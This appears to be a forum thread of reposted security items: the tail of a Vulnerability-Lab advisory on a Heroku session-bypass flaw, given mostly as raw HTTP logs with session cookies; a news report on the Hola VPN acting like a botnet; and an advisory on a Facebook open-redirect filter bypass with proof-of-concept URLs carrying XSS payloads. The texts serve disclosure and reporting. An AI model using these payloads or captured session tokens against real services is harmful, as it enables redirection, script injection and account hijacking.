rack.session=P8zZlFpkxJkI4ZLxjTorLaS7chYJ_xvm3tBRWqep-FyoNj_WSHDck99ggLaKgLczUMG6QylLu1VbNinWWd2uTvosTC3p811iQmobo8BwOeNgaY-Iyei8yP-c294TzPqzGmipSdIDCpCJJNlRu9fNDBgAppjFQi8lwNVmyyVPgwZc1tMa6KBi9Dx9Z6QxGLGykZPfxZvLCXHanhPgfRdxttpcO4uG-zklXg7kHrAri8MDvjXJbXvXr-BBnkWbr1hPFOH2z7BZXiBvTeKIuB6N_fqOEredXT8KRwcVGHxoHRFVsBQvr8bFqR8C_ImSzTqpkjjA_32wqf_t8oyVyGRt6Wf2RAjCO2Ve9nvECAaMhlA0AAChwZ7zPDYErU6WPGumLDLGGQJyeRxB31TPehBownCAIAtyZIBmoBmnCNRM5t6czeCBR1U7xMTBctVh58lH-0WIE1uESRcFYGiEjrefszmsjtQuv8XOS3i0zqBn4e7rKe5BQvvm_lWLlDOumVoMa7OKsaV7TuprlYP4n5LpWeOenBxb1JtTY8ASoQzv3rllKfG_LuQn0OGHVnCu9BsSd6B9qdZKqNZL1kA2xlt3SKrjt5qgIpLs3Wq4N3H3n5yXCIKduxNkqDFd5bJ8Ibx1prC44SktuOnv4v9xQaCTtWfw3NI_068iXRGBt0sDnq0%3D%7Cdyw4qNVeN1QJkse0PYVkMA%3D%3D%7Cf92ff337070c04e0bc1331b08bd2d38420af6bea0707a1ccfc813d4ce3b89c82; path=/; expires=Mon, 20 Oct 2014 15:56:23 -0000; HttpOnly; secure] Vary[Accept-Encoding] Content-Encoding[gzip] Request-Id[8583828c-b434-43b4-a8a2-9df47b64d82d] Transfer-Encoding[chunked] Via[1.1 vegur] 17:56:37.841[603ms][total 603ms] Status: 302[Found] GET https://dashboard.heroku.com/account Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[dashboard.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _my-heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZG--af37490991f3a343d1126f2e451efbf7744c0f9a; __utmb=148535982.65.9.1411228524365; user_session_secret=BAhJIgKKBWFGcHhTbVkzVUVjeE1TdGxVSGcwWTJ3clRVMTVWWE5pYkZsUFVrRkpVMkpPYkRsR2VVdHRVeTlQWTBkaFl5OUJlSGRHVVVNMEswOW5SR1pvUVVSdFZYUk9SVWxVZGxKS1UwdHJiRTgxZEhRNGMxTnJNbUZrYVVsa01VMUdWRmxJUVVkUlMxZzJTVkJ2YUdwSVJpdGtSSFVyWTNkRVdISkJjelp4UXpVMGRVOHZMekF4UzFCT2JYRXJibVpUTUV4SVJIVmxaa2QzTmtWQlJsSk5ibEpIWkVodksyVnphV1JXVEUxdlQzcEVOREYwWjNSc2RUUndhRmwyVUdObk0xaEJMMVpQUlN0SVMyazVkbWg1UzBWV1RsTlVWVVEyVjJOVFF6VlZUemxRVlZkelZIWm5WbFpxV21FMGJIRjJZM1F2UlRWSlN6Z3hVVkJNVVc1cWQwRjJRekJEWVVrd2RuY3dhVnBtTjFaQlluWlZlSEZCU2k5WGNYZ3pkVEJKTlRGaVNHSnRNRUpSVGpWdmJXVndjSEJsVGpKa09WVTNkM0pFVUd0WFVsaDNSbHBJVjNjd01WQkllbTlWUmtodlFXOUNXbEl4WlZkdmVIQk9ZVTVGWVdKM2FGcE5ORzFuU1ZCVmVHOVFUbTlHWkVKTFQzRkRLM3BVVjAxT1dYVXlUR055YTBGVGIwOVhSbFZ2UWxjMmEwVTBjV2R5TWpSVk9IWnBkSEEwY1RkaFZEZFpLeTloUnpSUVZtNW9Xa3hVVkVkUWFIWjRjamxhTUhoSE5FUk9RbTVwZW1RemNHcHlUVmhWWkVWelVEWk5PRlpvYkRNM2NscFBjR3RMUnpsRmVuVllSbXBCVlRseWNuZE1hSGMxVDJ4VGNVNW1lR0pVVnl0a2N6bFZZVlpqYkZsSFlXNHhZMWhvVVZFMFVVaG5iRzltTmpsRmFXZDRiVUp6VEhCQlZrZzFaWFpJVW1GQ01rNU5URUZuVnpGSlkyUkdSRnBaVkdJeVkwdGlWVm81ZEU1RGJFTXZha2xIVHpGWmJUQm9SREJ3WWtsUFpVVTJlWEJvUTA1amVTOURjbmw0UWpCa2EyRXZhblJtY1U5ak4wSk9kbkpYVEhKTGR5dGpSaXMyVlhwdWEzVnFiRlpKVXpkdldteDVVSFJrVTFsaVJXMHJjMVowVlhwcVdsSTRVV3dyY25GWFZFaEZMM1ZQTlZWRVRGSlRPRk14Y2s1MFltRXdaelZUTkV0aFZqTmFZbFJ4T1N0WGNtMXBTR3RuWW1abVpYQkZXVVpQV21aM1JUZ3dNekUxTjA1ME5FOXBVRFF2Ykc1TGJYSjBVUzltTTAxRFkwcEdaVnAzUjNsSE5rNW5aRk5XSzNwT1ExVnhPR2hKVGpWd1NqaGtTWE4wTkdacVFrUTFRMk5IV0dwb1JYbFNPWEoxZG05T1pWWXlhM2xpUW1wMWJHVmxTelJ6V2xWMVZURkhMMDE1Y210SlVrVkVMMjk2T0ZKTWEwTTNVVWRyTkVNcmEwOXJibEJWTW5GcVMxRnRjMFJsU1VobWREbHRPV3hvTDNkRE9ITmtjVGwxVFRoRlpXaHJaVk5hTlV0VWFIaFBVVVZGUVRCQk4wWmxNMmR4ZVdoNlJHMDJXRzFhVG1OVVlVaDZTMDl6U3pNM2MzUk5PWEJaTUhWUFEwNVlRekZJWmpCS01HaGFVM05XYVU4NFVtZFNOVnBoUW5SWUsyNDVWbkZhUWxWdlkxZHpPVFo0TjFWc1pGbHRTV0pOWkdwU2EwYzRaejB0TFVkRWRUWm1TV0ZVU2tjM1NXeFdRekJCYWs1cGJFRTlQUT09LS1jZTZmNmQ0MTBhNjQyNzhmZGNkMmEwMjk0ZDUxOGJhNjU0NmQzM2FjBjoGRUY%3D--bd9c611ce38c8221d606e59d0e41c5571aa3ef06; dashboard_session_nonce=891e297c-fed0-4932-8c59-32d7d341f4dc; _ga=GA1.3.181049422.1411214008; __utma=155166509.181049422.1411214008.1411228144.1411228144.1; __utmb=155166509.7.10.1411228144; __utmc=155166509; __utmz=155166509.1411228144.1.1.utmcsr=dashboard-next.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/new; visitor_id36622=273629684; flash=%7B%7D] Connection[keep-alive] Response Header: Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:48 GMT] Content-Type[text/html; charset=utf-8] Transfer-Encoding[chunked] status[302 Found] Strict-Transport-Security[max-age=31536000] Location[https://dashboard.heroku.com/login] Cache-Control[must-revalidate, no-cache, no-store, private] Pragma[no-cache] Expires[0] X-Frame-Options[SAMEORIGIN] x-ua-compatible[IE=Edge,chrome=1] Set-Cookie[_my-heroku_session=BAh7CUkiEF9jc3JmX3Rva2VuBjoGRUZJIjFsZGdXRThzZ0IvNDJIMWJWM1dyU3ZXWXlpZUhMa21YWFVEc2lsV2ExR1ZRPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWQ2OTI4OTJkOGQzMDliMzY5YWY5ODFmOThhNWU4NGU4BjsAVEkiC2luX29yZwY7AEZGSSIQcmVkaXJlY3RfdG8GOwBGIg0vYWNjb3VudA%3D%3D--3aacd80781b201de87c148efa8ef6adb5a004d99; path=/; secure; HttpOnly] x-request-id[5e276c4f-1382-4328-ae95-b87a73376089] x-runtime[0.006972] x-rack-cache[miss] Via[1.1 vegur] 17:56:39.215[207ms][total 207ms] Status: 304[Not Modified] GET https://dataclips.heroku.com/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header: Host[dataclips.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=ZXNtT29YN3FZajNrQ2U0OTBWbzZ2VHlWSUJDdnVtNmV3TEtLc25ZT0h5MW9rS2FRVzRZblpLRktRQkd3ZXZPY2hwMm41a1VjSlNEY3VGbkVXYjRQTWVLcmFsTEk4MDQvc1laWTViZ2JVZ2RzUEdMNFpGY2JZRTdwdWN3K3ZWTW56VEVpcFU4OHg1T1BQMHBGbTdkNlNFakpZMjVMVE1mNnZxM2dPL3BNKzZ1VVljeTRGUk4rbEhqcld1UEdBR3lCdDM5RkxpZk1hZWsyZkFyY0dGZmVxeUlheUt5NXhaNGNJb1ZTR2VkL1o0ZHM2OW9HTnBZb1dOZys3dVpGSFdKRDA1TysvaHg2enlWMGhLaVhnUmxwbnQ0S1JMeVl3WHFvZWwvaUI2Qy9rQU9aMmhqNllDVVJXa0FsNXZwZEdCQVpWS2d0VTlvMjZPQ1hENy9tZmE0REdZT1NvdmN3SDcrMG15dElDRlFNVkJEN24yWS9lUU03RjduTDkzQlAxcnpkNHhldEhQOVpyZjNUM3JVaU5Fek9BcmI5WGNsN0c2dFRPMTZqMjRyNnZnRndBYi9rWEcyTGMwMTZadGxhQmVWQ1hQUURyUk9tZjZtZitTSk1LMmNhQmFkOEJ3NFQreGdxUS9qeXFrUHdNQWt5cXJvRWxTQis1R1lTWThkeHI4YzRrQVVROFdhTzZEb0pMZTR3K3pLZXBoUkVMMlBncUNQZlpleTRPY1U1cHJrPS0tMHFTV09tekRBajVKeXlPS0dESE82QT09--f620fe024be3e5610f3af2885c5b2758b30cffbf; __utmb=148535982.65.9.1411228524365] Connection[keep-alive] If-None-Match["015d655373394c49a35217e89173847e"] Response Header: Content-Length[0] Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:49 GMT] status[304 Not Modified] Strict-Transport-Security[max-age=31536000] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] X-Frame-Options[SAMEORIGIN] Etag["015d655373394c49a35217e89173847e"] Cache-Control[max-age=0, private, must-revalidate] Set-Cookie[_session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; path=/; expires=Sun, 21 Sep 2014 15:56:49 -0000; secure; HttpOnly] x-request-id[b278f0fa-e866-4fd5-91cb-26c023746359] x-runtime[0.027082] Via[1.1 vegur] 17:56:48.969[192ms][total 192ms] Status: 304[Not Modified] GET https://dataclips.heroku.com/clips/new Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type] Request Header: Host[dataclips.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dataclips.heroku.com/] Cookie[ref=KZaqbfoPQd2NM5_HmtNkDBgaDRYcVm4FgoRlK3QXRYUX5XYlLVpbKsbv-DvM8FmqnHEUYhAmss84wkpN3jOao6PJyJ90AhbTjDrK5i7V20kDxZvoen4Zz_bztDsXTa1J%7CTzM52sJrCEMP3TpTvJzGMA%3D%3D%7C4a7a7f34648ede535a79a2bc56dd9366b7df78a1462aa844f86196b14609e103; _ga=GA1.2.181049422.1411214008; __utma=148535982.181049422.1411214008.1411216956.1411228016.3; __utmc=148535982; __utmz=148535982.1411216956.2.2.utmcsr=postgres.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/databases; optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C%22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1411214007860r0.1948891553088572; optimizelyBuckets=%7B%7D; _session_id=Ync2S1ZnSHM3M2FMZC95S1pZeFQrRnc4bWx0WGpjV21rL2k4UEh4WDhyY2lPN29ENHRydzd1aVE4WS81RGMxdUR3Z21nS2R4NUJyNjdLNEs4MWpieGk5QXNhS1ZEeUxlcldqV3UySXJ4Z3k4NkY2VHhCU3ZxT3NyR2RnYzNlTFdycmFiTXJHM0FqU0lyVEp4ZTlhd3ptWjIzM01mMDdnZXJocnc0Q2Y0eHhvR2xoY29haVFWcjZHRExXeXhaVFZRT0JqRmRWSmY4Yk8weHdNZXZOMU5NMCtYUWVzVUIrQW9GblRPRS9TU0twMGVLTnZjRWpjbFY4NC9LaDMzb2hUVi84L08zUUV1WEpTMEMxMTlqektjQy8zT1JrMC9RVm5JODJjMnVicXJpRi9xb1FXeThSZ3JJc2s0SndKUzM4NjJ0SzhudkVncWdJT2NDSHU5N1BhNXpiT0ZQRmY3Q2NwRzhjcFMrbzloTzlRYUJ0Wi9VbVllMnhEYjRYLzlrRkZwZGhPUFFMckJacExnVlZOMi96NmdnWEltVnB0QTFLV1JxbkZMRG9GaStGY1RQZ28wSnpJT1JMaUoyWUxTUUNRVHZwSmRhVGNzL3NkWktuZk96YjVkVTBQSVBaVzNZNytJczJra21yOWQvVHB4bVl5QkJiblVuaEJZTzZVRnpvZjNMUXF5YnZBM01DYU8vZkp2TWNQRUV2c1VjeVRLOUpOc3VLWWYvUlY5dnhzPS0tTjd6WW9BWUE1a3ZSWE9wRXEyRmVsZz09--a0b8c8a8f07996dbd6a5c70dbb79cd772dd3db77; __utmb=148535982.67.9.1411228524365; optimizelyPendingLogEvents=%5B%5D] Connection[keep-alive] If-None-Match["809917d3d9ac788b43864dd9470788d6"] Response Header: Content-Length[0] Connection[keep-alive] Server[nginx/1.5.7] Date[Sat, 20 Sep 2014 15:56:59 GMT] status[304 Not Modified] Strict-Transport-Security[max-age=31536000] X-XSS-Protection[1; mode=block] x-content-type-options[nosniff] X-Frame-Options[SAMEORIGIN] Etag["809917d3d9ac788b43864dd9470788d6"] Cache-Control[max-age=0, private, must-revalidate] Set-Cookie[_session_id=L0FpUHg1M3ZuUkNUeWtxVFNxdW1UY3p0QkM0OUNsVUMyL2VBN24xZVh3d1hlN2s5VUI5Tjl1b3BzV00yaW93elp0RGNKV3cxODh0VVVmSG9CeC9NSDh0WVVvekVqUkV5bHFaSStCUnkrZ21iWGRmVy96K210K01tQXo1SkxHRldLVVZYMFdiazVkcG96N3ZUWGZhK28vRWh5WS9id0ZIWTBTdU51a1dUaWRLK1gvWlI0WFRScW5PMU1MOURsLzV0QnRqdUhZWE9SSzdZRzVSazEzeko2Y01jZjFGRGNiUVRpQ0doSitISHpjSG8xT1JGamtVeDRKRjhBMHIxZkl5Q3N6bW9BODJqekNDMnhpRjExa3N3SlJpbU4xT1Rvc0Y3Uy9wNHdmMUVMbzV5OGxwK0N2bmJQdVJRazlOamRQbkJ5RXJuVmwvOW94azJhTHRMUzY4WkszdkU0cG9zaExXQ3FWUXZqRXpmc01DOFB5V1Nhbkp0bzhlejVCZGFaeFh6RGM3TTFqYkV5TXpGNVF3SkptRy95dkVTd1IyRS93SkVTVjYrRnF1dlFLa0Q2cGdKdkVDV0NoSkdrZDBiRzVyRFRmVHE3Z0hBb1pQbEM4RTBsT3NsNURYRlZoL0dSNUtsVjRjVFc3cFZFME1DUElhblRxTUdZYVMyUUFUaWQ0YUVMTytLZytVOHJaa3RQYVJzcUZ3RGZEWEFOdTBWT2Y1ZVQ0b0kzK2k3Z3MwPS0tQnhFMFYyVGxDODRjSXpIQ3g5R1ZhQT09--1ea1df64ab1a053df5ea5a4eed8a3bda7db428a8; path=/; expires=Sun, 21 Sep 2014 15:56:59 -0000; secure; HttpOnly] x-request-id[433e3190-bc29-4192-9a61-90754e41bb44] x-runtime[0.029809] Via[1.1 vegur] Reference(s): https://dataclips.heroku.com/ https://dataclips.heroku.com/clips/new https://postgres.heroku.com/databases - https://dashboard.heroku.com/account https://dashboard.heroku.com/login https://id.heroku.com/logout Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure proof of the dataclip and postgres service values that are processing to use the login credentials. The service needs to process expired sessions through all portal in the same or next request without allowing to access separtly requested section with the expired session credentials. Security Risk: ============== The security risk of the re-auth session bypass vulnerability in the dataclip and postgres information page is estimated as high. (CVSS 6.1) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Sursa https://dl.packetstormsecurity.net/1506-exploits/VL-1323.txt
  5. Virtual private network Hola has downplayed concerns that its 47 million users could become part of a botnet. A botnet is a network of hijacked computers that can be used for criminal activity without the knowledge of their owners. Hola says it has always been open about sending other data via users' devices when they are not in use. However, in a blog post chief executive Ofer Vilenski acknowledged the firm had "made some mistakes". The Israeli company offers a free service but on the condition it can use customers' bandwidth "securely". Mr Vilenski said he had wrongly assumed that describing the network as "peer-to-peer" had made that clear. It also operates a commercial network called Luminati, which can be used to "route data through any of our millions of IPs [computer addresses] that are located in every city around the world", according to its website. The website goes on to say the Luminati network consists of "personal PCs, laptops and mobile devices of participating users". They are the private devices of Hola users, it has been claimed. "The concern with Hola is that it appears to operate like a botnet, and one that is potentially insecure at that," said cybersecurity expert Prof Alan Woodward, from Surrey University. "There is mounting anecdotal evidence that the network is being used as a real botnet. "I haven't seen that in practice but the way in which the service can use your machine appears to have the potential to do something like that." People often use virtual private networks to access internet content that is unavailable in their home country - such as video streaming services Netflix and the BBC iPlayer - but most VPNs are not free. Ofer Vilenski said in his blog post that Hola generated revenue by offering the VPN for "legitimate commercial purposes" only. "We have a record of the real identification and traffic of the Luminati users, such that if a crime is committed, we can report this to the authorities, and thus the criminal is immediately identified," he wrote. Last week, the founder of message board 8Chan said the site had suffered a distributed denial of service (DDOS) attack - when a website is overwhelmed by false requests from computers - that could be traced back to the Luminati network. Mr Vilenski accepted that a spammer had "passed through our filters" to use the service but added that the account had been terminated and "necessary measures" put in place. He said that the firm would shortly begin a "bug bounty programme" offering rewards for people who identified security weaknesses in Hola and Luminati products. Prior to the blog post hundreds of people had already posted on community site Reddit, calling for users to uninstall the network over fears that their devices could unintentionally be used for criminal activity, and Android users have been leaving warning messages in the review section of the app on Google's Play Store. In the FAQ section on its website, updated on 29 May, Hola explains how its "peer-to-peer" model works. "When your device is not in use, other packets of information from other people may be routed through your device," it says. "Hola does this securely, not allowing any access to any of your information. Your device is used only as a router." It also says that users of its premium service, for a monthly fee of $4.99 (£2.28), are not part of the network. Source
  6. Document Title: =============== Facebook #26 - Filter Bypass & Exception Handling Redirect Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1483 http://www.vulnerability-lab.com/get_content.php?id=1484 Video View: https://www.youtube.com/watch?v=I65zFWF-pMg Release Date: ============= 2015-05-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1483 Common Vulnerability Scoring System: ==================================== 5.1 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a filter bypass and open redirect web vulnerability in the official Facebook online-service framework. Vulnerability Disclosure Timeline: ================================== 2015-05-01: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2015-05-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Facebook Product: Framework - Content Management System 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ A filter validation issue is existant in the exception-handling that normally redirects to the original facebook source. Ever if an error comes up the website will show the context in the secure exception and redirects on okey click to the original valid source. In case of terminating the string (%00%00_%3F) with extended <_ it is possible to bypass the exception-handling filter exception to redirect invalid source to an external target. The video demonstrates how to bypass the filter validation by confusing the context copying with the non encoded url that invalid. By generating a payload that is ahead in the display value and atleast in the url ref the target exception redirect can be manipulated. Proof of Concept (PoC): ======================= https://www.facebook.com/dialog/send?app_id=102628213125203&display=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_popup&link=http%3A%2F%2Fwww.ebay.com%2Fcln%2F%00%2F%00%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3Froken%3DcUgayN&description=%00%40eBayF%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_&redirect_uri=http%3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_popup%2Fsoc%2Fshareclose&__mref=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble https://www.facebook.com/dialog/send?app_id=102628213125203&display=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_popup&link=http%3A%2F%2Fwww.ebay.com%2Fcln%2F%00%2F%00%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3%00%3C_&{alert%28%27XSS%27%29}%3B%3E%3Froken%3DcUgayN&description=%00%40eBayF%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_&redirect_uri=http%3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_popup%2Fsoc%2Fshareclose&__mref=F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble Payload: 3A%2F%2F%EF%BF%BD/%EF%BF%BD%EF%BF%BD%3C%uFFFD/%uFFFD%uFFFD%3C_ F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble F%00%2F%00%00%3C%uFFFD/%uFFFD%uFFFD%3C_message_bubble<_ PoC Video(s): The video demonstrates how to evade the filter validation of the message context that is delivered by a url link. The researcher demonstrates how to bypass the basic encoding by preparing a valid exception with unauthorized redirect. Security Risk: ============== The security risk of the filter bypass and exception redirect web vulnerability is estimated as medium. (CVSS 5.1) The same payload to evade the filter validation can be used to other sections and exceptions that redirect the ref with the same conditions. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 